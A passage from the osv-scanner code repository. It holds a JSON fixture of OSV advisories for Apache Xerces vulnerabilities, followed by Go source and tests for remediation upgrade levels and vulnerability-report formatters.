"http://www.openwall.com/lists/oss-security/2009/10/26/3" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpujan2010-084891.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/topics/security/cpuoct2009-096303.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2009-1615.html" }, { "type": "WEB", "url": "http://www.redhat.com/support/errata/RHSA-2011-0858.html" }, { "type": "WEB", "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/35958" }, { "type": "WEB", "url": "http://www.securitytracker.com/id?1022680" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-890-1" }, { "type": "WEB", "url": "http://www.us-cert.gov/cas/techalerts/TA09-294A.html" }, { "type": "WEB", "url": "http://www.us-cert.gov/cas/techalerts/TA10-012A.html" }, { "type": "WEB", "url": "http://www.vmware.com/security/advisories/VMSA-2009-0016.html" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2009/2543" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2009/3316" }, { "type": "WEB", "url": "http://www.vupen.com/english/advisories/2011/0359" } ], "database_specific": { "cwe_ids": [], "github_reviewed": true, "github_reviewed_at": "2020-06-15T15:55:30Z", "nvd_published_at": "2009-08-06T15:30:00Z", "severity": "MODERATE" } }, { "schema_version": "1.7.3", "id": "GHSA-7j4h-8wpf-rqfh", "published": "2022-05-13T01:01:06Z", "modified": "2024-12-03T06:18:52.393319Z", "aliases": [ "CVE-2013-4002" ], "summary": "Missing XML Validation in Apache Xerces2", "details": "XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.0" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7j4h-8wpf-rqfh/GHSA-7j4h-8wpf-rqfh.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4002" }, { "type": "WEB", "url": "https://github.com/apache/xerces2-j/commit/266e837852e0f0e3c8c1ad572b6fc4dbb4ded17" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2014:0414" }, { "type": "WEB", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/85260" }, { "type": "PACKAGE", "url": "https://github.com/apache/xerces2-j" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/XERCESJ-1679" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/49dc6702104a86ecbb40292dcd329ce9ae4c32b74733199ecab14a73@%3Cj-users.xerces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html" }, { "type": "WEB", "url": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00001.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00026.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00027.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00028.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-07/msg00029.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00000.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-08/msg00003.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2013-11/msg00010.html" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-updates/2013-11/msg00023.html" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=138674031212883\u0026w=2" }, { "type": "WEB", "url": "http://marc.info/?l=bugtraq\u0026m=138674073720143\u0026w=2" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1059.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1060.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1081.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1440.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1447.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1451.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2013-1505.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1818.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1821.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1822.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2014-1823.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0675.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0720.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0765.html" }, { "type": "WEB", "url": "http://rhn.redhat.com/errata/RHSA-2015-0773.html" }, { "type": "WEB", "url": "http://security.gentoo.org/glsa/glsa-201406-32.xml" }, { "type": "WEB", "url": "http://support.apple.com/kb/HT5982" }, { "type": "WEB", "url": "http://svn.apache.org/viewvc/xerces/java/trunk/src/org/apache/xerces/impl/XMLScanner.java?r1=965250\u0026r2=1499506\u0026view=patch" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg1IC98015" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21644197" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21653371" }, { "type": "WEB", "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21657539" }, { "type": "WEB", "url": "http://www.hitachi.co.jp/Prod/comp/soft1/global/security/info/vuls/HS13-025/index.html" }, { "type": "WEB", "url": "http://www.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm_filenet_content_manager_and_ibm_content_foundation_xml_4j_denial_of_service_attack_cve_2013_4002" }, { "type": "WEB", "url": "http://www.ibm.com/developerworks/java/jdk/alerts/#IBM_Security_Update_July_2013" }, { "type": "WEB", "url": "http://www.ibm.com/support/docview.wss?uid=swg21648172" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2033-1" }, { "type": "WEB", "url": "http://www.ubuntu.com/usn/USN-2089-1" } ], "database_specific": { "cwe_ids": [ "CWE-112" ], "github_reviewed": true, "github_reviewed_at": "2022-07-08T19:14:49Z", "nvd_published_at": "2013-07-23T11:03:00Z", "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-h65f-jvqw-m9fj", "published": "2022-01-27T16:13:07Z", "modified": "2024-02-16T08:21:32.697367Z", "aliases": [ "CVE-2022-23437" ], "summary": "Infinite Loop in Apache Xerces Java", "details": "There's a vulnerability within the Apache Xerces Java (XercesJ) XML parser when handling specially crafted XML document payloads. This causes, the XercesJ XML parser to wait in an infinite loop, which may sometimes consume system resources for prolonged duration. This vulnerability is present within XercesJ version 2.12.1 and the previous versions.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.2" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.12.0", "2.12.1", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-h65f-jvqw-m9fj/GHSA-h65f-jvqw-m9fj.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23437" }, { "type": "PACKAGE", "url": "https://github.com/jboss/xerces" }, { "type": "WEB", "url": "https://lists.apache.org/thread/6pjwm10bb69kq955fzr1n0nflnjd27dl" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221028-0005" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/01/24/3" } ], "database_specific": { "cwe_ids": [ "CWE-91" ], "github_reviewed": true, "github_reviewed_at": "2022-01-25T20:46:16Z", "nvd_published_at": "2022-01-24T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vmqm-g3vh-847m", "published": "2020-06-15T18:51:38Z", "modified": "2024-03-11T05:17:10.701030Z", "aliases": [ "CVE-2012-0881" ], "summary": "Denial of service in Apache Xerces2", "details": "Apache Xerces2 Java Parser before 2.12.0 allows remote attackers to cause a denial of service (CPU consumption) via a crafted message to an XML service, which triggers hash table collisions.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.0" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-vmqm-g3vh-847m/GHSA-vmqm-g3vh-847m.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-0881" }, { "type": "WEB", "url": "https://github.com/apache/xerces2-j/commit/992b5d9c24102ad20330d36c0a71162753a37449" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.openwall.com/lists/oss-security/2014/07/08/11" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rea7b831dceeb2a2fa817be6f63b08722042e3647fb2d47c144370a56@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rea7b831dceeb2a2fa817be6f63b08722042e3647fb2d47c144370a56%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451@%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3Csolr-user.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/49dc6702104a86ecbb40292dcd329ce9ae4c32b74733199ecab14a73@%3Cj-users.xerces.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/49dc6702104a86ecbb40292dcd329ce9ae4c32b74733199ecab14a73%40%3Cj-users.xerces.apache.org%3E" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/XERCESJ-1685" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=787104" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2020-06-15T15:51:37Z", "nvd_published_at": "2017-10-30T16:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-w4jq-qh47-hvjq", "published": "2022-02-15T01:37:41Z", "modified": "2023-11-08T04:02:26.293474Z", "aliases": [ "CVE-2020-14338" ], "summary": "Improper Input Validation in Xerces", "details": "A flaw was found in Wildfly's implementation of Xerces, specifically in the way the XMLSchemaValidator class in the JAXP component of Wildfly enforced the \"use-grammar-pool-only\" feature. This flaw allows a specially-crafted XML file to manipulate the validation process in certain cases. This issue is the same flaw as CVE-2020-14621, which affected OpenJDK, and uses a similar code. All xerces jboss versions before 2.12.0.SP3.", "affected": [ { "package": { "name": "xerces:xercesImpl", "ecosystem": "Maven", "purl": "pkg:maven/xerces/xercesImpl" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.12.0.sp3" } ] } ], "versions": [ "2.0.0", "2.0.2", "2.10.0", "2.11.0", "2.2.1", "2.3.0", "2.4.0", "2.5.0", "2.6.0", "2.6.1", "2.6.2", "2.6.2-jaxb-1.0.6", "2.7.1", "2.8.0", "2.8.1", "2.9.0", "2.9.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.12.0.sp2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/02/GHSA-w4jq-qh47-hvjq/GHSA-w4jq-qh47-hvjq.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-14338" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1860054" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf96c5afb26b596b4b97883aa90b6c0b0fc4c26aaeea7123c21912103@%3Cj-users.xerces.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2022-06-24T01:25:49Z", "nvd_published_at": "2020-09-17T15:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ] } ] } ================================================ FILE: internal/remediation/testhelpers_test.go ================================================ package remediation_test import ( "cmp" "maps" "slices" "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/client" "github.com/google/osv-scanner/v2/internal/resolution/clienttest" "github.com/google/osv-scanner/v2/internal/resolution/depfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/testutility" ) func parseRemediationFixture(t *testing.T, universePath, vulnPath, manifestPath string, opts resolution.ResolveOpts) (*resolution.Result, client.ResolutionClient) { t.Helper() rw, err := manifest.GetReadWriter(manifestPath, "") if err != nil { t.Fatalf("Failed to get ReadWriter: %v", err) } f, err := depfile.OpenLocalDepFile(manifestPath) if err != nil { t.Fatalf("Failed to open manifest: %v", err) } defer f.Close() m, err := rw.Read(f) if err != nil { t.Fatalf("Failed to parse manifest: %v", err) } cl := clienttest.NewMockResolutionClient(t, universePath, vulnPath) res, err := resolution.Resolve(t.Context(), cl, m, opts) if err != nil { t.Fatalf("Failed to resolve manifest: %v", err) } return res, cl } func checkRemediationResults(t *testing.T, res []resolution.Difference) { // ResolutionDiff is too large when dumped as JSON. // Extract & compare a subset of fields that are relevant for the tests. t.Helper() type minimalVuln struct { ID string AffectedNodes []resolve.NodeID } toMinimalVuln := func(v resolution.Vulnerability) minimalVuln { t.Helper() nodes := make(map[resolve.NodeID]struct{}) for _, sg := range v.Subgraphs { nodes[sg.Dependency] = struct{}{} } sortedNodes := slices.AppendSeq(make([]resolve.NodeID, 0, len(nodes)), maps.Keys(nodes)) slices.Sort(sortedNodes) return minimalVuln{ ID: v.OSV.GetId(), AffectedNodes: sortedNodes, } } type minimalPatch struct { Deps []manifest.DependencyPatch // TODO: The dep.Type does not marshal to JSON. EcosystemSpecific any } type minimalDiff struct { Patch minimalPatch RemovedVulns []minimalVuln AddedVulns []minimalVuln } minimalRes := make([]minimalDiff, len(res)) for i, diff := range res { minimalRes[i].Patch = minimalPatch{ Deps: diff.Deps, EcosystemSpecific: diff.EcosystemSpecific, } minimalRes[i].AddedVulns = make([]minimalVuln, len(diff.AddedVulns)) for j, v := range diff.AddedVulns { minimalRes[i].AddedVulns[j] = toMinimalVuln(v) } minimalRes[i].RemovedVulns = make([]minimalVuln, len(diff.RemovedVulns)) for j, v := range diff.RemovedVulns { minimalRes[i].RemovedVulns[j] = toMinimalVuln(v) } cmpFn := func(a, b minimalVuln) int { if c := cmp.Compare(a.ID, b.ID); c != 0 { return c } return slices.Compare(a.AffectedNodes, b.AffectedNodes) } slices.SortFunc(minimalRes[i].AddedVulns, cmpFn) slices.SortFunc(minimalRes[i].RemovedVulns, cmpFn) } testutility.NewSnapshot().MatchJSON(t, minimalRes) } ================================================ FILE: internal/remediation/testmain_test.go ================================================ package remediation_test import ( "testing" "github.com/google/osv-scanner/v2/internal/testutility" ) func TestMain(m *testing.M) { m.Run() testutility.CleanSnapshots(m) } ================================================ FILE: internal/remediation/upgrade/config.go ================================================ // Package upgrade provides functionality for parsing upgrade configurations for remediation. package upgrade import ( "strings" "github.com/google/osv-scanner/v2/internal/cmdlogger" ) type Config map[string]Level func NewConfig() Config { return make(Config) } // Set the allowed upgrade level for a given pkg name. // If level for pkg was previously set, sets the package to the new level and returns true. // Otherwise, sets the package's level and returns false. func (c Config) Set(pkg string, level Level) bool { _, alreadySet := c[pkg] c[pkg] = level return alreadySet } // SetDefault sets the default allowed upgrade level packages that weren't explicitly set. // If default was previously set, sets the default to the new level and returns true. // Otherwise, sets the default and returns false. func (c Config) SetDefault(level Level) bool { // Empty package name is used as the default level. return c.Set("", level) } // Get the allowed Level for the given pkg name. func (c Config) Get(pkg string) Level { if lvl, ok := c[pkg]; ok { return lvl } // Empty package name is used as the default level. return c[""] } func ParseUpgradeConfig(specs []string) Config { config := NewConfig() for _, spec := range specs { idx := strings.LastIndex(spec, ":") if idx == 0 { cmdlogger.Warnf("WARNING: `--upgrade-config %s` - skipping empty package name", spec) continue } pkg := "" levelStr := spec if idx > 0 { pkg = spec[:idx] levelStr = spec[idx+1:] } var level Level switch levelStr { case "major": level = Major case "minor": level = Minor case "patch": level = Patch case "none": level = None default: cmdlogger.Warnf("WARNING: `--upgrade-config %s` - invalid level string '%s'", spec, levelStr) continue } if config.Set(pkg, level) { // returns true if was previously set cmdlogger.Warnf("WARNING: `--upgrade-config %s` - config for package specified multiple times", spec) } } return config } ================================================ FILE: internal/remediation/upgrade/config_test.go ================================================ package upgrade_test import ( "testing" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) func configSetExpect(t *testing.T, config upgrade.Config, pkg string, level upgrade.Level, want bool) { t.Helper() got := config.Set(pkg, level) if got != want { t.Errorf("Set(%v, %v) got %v, want %v", pkg, level, got, want) } } func configSetDefaultExpect(t *testing.T, config upgrade.Config, level upgrade.Level, want bool) { t.Helper() got := config.SetDefault(level) if got != want { t.Errorf("SetDefault(%v) got %v, want %v", level, got, want) } } func configGetExpect(t *testing.T, config upgrade.Config, pkg string, want upgrade.Level) { t.Helper() if got := config.Get(pkg); got != want { t.Errorf("Get(%v) got %v, want %v", pkg, got, want) } } func TestConfig(t *testing.T) { t.Parallel() config := upgrade.NewConfig() // Default everything to allow major configGetExpect(t, config, "foo", upgrade.Major) configGetExpect(t, config, "bar", upgrade.Major) // Set specific package configSetExpect(t, config, "foo", upgrade.Minor, false) configGetExpect(t, config, "foo", upgrade.Minor) configGetExpect(t, config, "bar", upgrade.Major) // Set package again configSetExpect(t, config, "foo", upgrade.None, true) configGetExpect(t, config, "foo", upgrade.None) configGetExpect(t, config, "bar", upgrade.Major) // Set default configSetDefaultExpect(t, config, upgrade.Patch, false) configGetExpect(t, config, "foo", upgrade.None) configGetExpect(t, config, "bar", upgrade.Patch) // Set default again configSetDefaultExpect(t, config, upgrade.Major, true) configGetExpect(t, config, "foo", upgrade.None) configGetExpect(t, config, "bar", upgrade.Major) // Set other package configSetExpect(t, config, "bar", upgrade.Minor, false) configGetExpect(t, config, "foo", upgrade.None) configGetExpect(t, config, "bar", upgrade.Minor) configGetExpect(t, config, "baz", upgrade.Major) } ================================================ FILE: internal/remediation/upgrade/level.go ================================================ package upgrade import ( "deps.dev/util/semver" ) type Level int const ( Major Level = iota Minor Patch None ) // Allows returns if the semver.Diff is allowable for this upgrade level constraint. func (level Level) Allows(diff semver.Diff) bool { if diff == semver.Same { return true } switch level { case Major: return true case Minor: return diff != semver.DiffMajor case Patch: return (diff != semver.DiffMajor) && (diff != semver.DiffMinor) case None: return false default: // Invalid level return false } } ================================================ FILE: internal/remediation/upgrade/level_test.go ================================================ package upgrade_test import ( "slices" "testing" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) func TestLevelAllows(t *testing.T) { t.Parallel() // Check every combination of Level + Diff allDiffs := [...]semver.Diff{ semver.Same, semver.DiffOther, semver.DiffMajor, semver.DiffMinor, semver.DiffPatch, semver.DiffPrerelease, semver.DiffBuild, } levelDisallowed := map[upgrade.Level][]semver.Diff{ upgrade.Major: {}, upgrade.Minor: {semver.DiffMajor}, upgrade.Patch: {semver.DiffMajor, semver.DiffMinor}, upgrade.None: allDiffs[1:], // everything but semver.Same } for level, disallowed := range levelDisallowed { for _, diff := range allDiffs { want := !slices.Contains(disallowed, diff) got := level.Allows(diff) if want != got { t.Errorf("(Level: %v, Diff: %v) Allows() = %v, want %v", level, diff, got, want) } } } } ================================================ FILE: internal/reporter/cyclonedx.go ================================================ package reporter import ( "io" "strings" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type cycloneDXReporter struct { writer io.Writer version models.CycloneDXVersion } func (r *cycloneDXReporter) PrintResult(vulnerabilityResults *models.VulnerabilityResults) error { errs := output.PrintCycloneDXResults(vulnerabilityResults, r.version, r.writer) if errs != nil { for err := range strings.SplitSeq(errs.Error(), "\n") { cmdlogger.Warnf("Failed to parse package URL: %v", err) } } return nil } ================================================ FILE: internal/reporter/format.go ================================================ package reporter import ( "fmt" "io" "github.com/google/osv-scanner/v2/pkg/models" ) var format = []string{"table", "html", "vertical", "json", "markdown", "sarif", "gh-annotations", "cyclonedx-1-4", "cyclonedx-1-5", "spdx-2-3"} func Format() []string { return format } func newResultPrinter(format string, writer io.Writer, terminalWidth int, showAllVulns bool) (resultPrinter, error) { switch format { case "html": return &htmlReporter{writer}, nil case "json": return &jsonReporter{writer}, nil case "vertical": return &verticalReporter{writer, terminalWidth, showAllVulns}, nil case "table": return &tableReporter{writer, false, terminalWidth, showAllVulns}, nil case "markdown": return &tableReporter{writer, true, terminalWidth, showAllVulns}, nil case "sarif": return &sarifReporter{writer}, nil case "gh-annotations": return &ghAnnotationsReporter{writer}, nil case "cyclonedx-1-4": return &cycloneDXReporter{writer, models.CycloneDXVersion14}, nil case "cyclonedx-1-5": return &cycloneDXReporter{writer, models.CycloneDXVersion15}, nil case "cyclonedx-1-6": return &cycloneDXReporter{writer, models.CycloneDXVersion16}, nil case "spdx-2-3": return &spdxReporter{writer}, nil default: return nil, fmt.Errorf("%v is not a valid format", format) } } ================================================ FILE: internal/reporter/gh-annotations_reporter.go ================================================ package reporter import ( "io" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type ghAnnotationsReporter struct { writer io.Writer } func (r *ghAnnotationsReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { return output.PrintGHAnnotationReport(vulnResult, r.writer) } ================================================ FILE: internal/reporter/html_reporter.go ================================================ package reporter import ( "io" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type htmlReporter struct { writer io.Writer } func (r *htmlReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { return output.PrintHTMLResults(vulnResult, r.writer) } ================================================ FILE: internal/reporter/json_reporter.go ================================================ package reporter import ( "io" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type jsonReporter struct { writer io.Writer } func (r *jsonReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { return output.PrintJSONResults(vulnResult, r.writer) } ================================================ FILE: internal/reporter/reporter.go ================================================ // Package reporter provides functionality for reporting scan results in various formats. package reporter import ( "io" "github.com/google/osv-scanner/v2/pkg/models" ) type resultPrinter interface { // PrintResult prints the models.VulnerabilityResults per the logic of the // actual reporter PrintResult(vulnResult *models.VulnerabilityResults) error } func PrintResult( vulnResult *models.VulnerabilityResults, format string, writer io.Writer, terminalWidth int, showAllVulns bool, ) error { r, err := newResultPrinter(format, writer, terminalWidth, showAllVulns) if err != nil { return err } return r.PrintResult(vulnResult) } ================================================ FILE: internal/reporter/reporter_test.go ================================================ package reporter_test import ( "bytes" "testing" "github.com/google/osv-scanner/v2/internal/reporter" "github.com/google/osv-scanner/v2/pkg/models" ) func TestPrintResult(t *testing.T) { t.Parallel() for _, format := range reporter.Format() { stdout := &bytes.Buffer{} err := reporter.PrintResult(&models.VulnerabilityResults{}, format, stdout, 0, false) if err != nil { t.Errorf("Reporter for '%s' format not implemented", format) } } } func TestPrintResult_UnsupportedFormatter(t *testing.T) { t.Parallel() stdout := &bytes.Buffer{} err := reporter.PrintResult(&models.VulnerabilityResults{}, "unsupported", stdout, 0, true) if err == nil { t.Errorf("Did not get expected error") } } ================================================ FILE: internal/reporter/sarif_reporter.go ================================================ package reporter import ( "io" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type sarifReporter struct { writer io.Writer } func (r *sarifReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { return output.PrintSARIFReport(vulnResult, r.writer) } ================================================ FILE: internal/reporter/spdx.go ================================================ package reporter import ( "io" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type spdxReporter struct { writer io.Writer } func (r *spdxReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { return output.PrintSPDXResults(vulnResult, r.writer) } ================================================ FILE: internal/reporter/table_reporter.go ================================================ package reporter import ( "fmt" "io" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" ) type tableReporter struct { writer io.Writer markdown bool // 0 indicates not a terminal output terminalWidth int showAllVulns bool } func (r *tableReporter) PrintResult(vulnResult *models.VulnerabilityResults) error { if len(vulnResult.Results) == 0 && vulnResult.LicenseSummary == nil && !cmdlogger.HasErrored() { fmt.Fprintf(r.writer, "No issues found\n") return nil } if r.markdown { output.PrintMarkdownTableResults(vulnResult, r.writer, r.showAllVulns) } else { output.PrintTableResults(vulnResult, r.writer, r.terminalWidth, r.showAllVulns) } return nil } ================================================ FILE: internal/reporter/vertical_reporter.go ================================================ package reporter import ( "fmt" "io" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/output" "github.com/google/osv-scanner/v2/pkg/models" "github.com/jedib0t/go-pretty/v6/text" ) type verticalReporter struct { writer io.Writer // 0 indicates not a terminal output terminalWidth int showAllVulns bool } func (r *verticalReporter) PrintResult(vulnResult 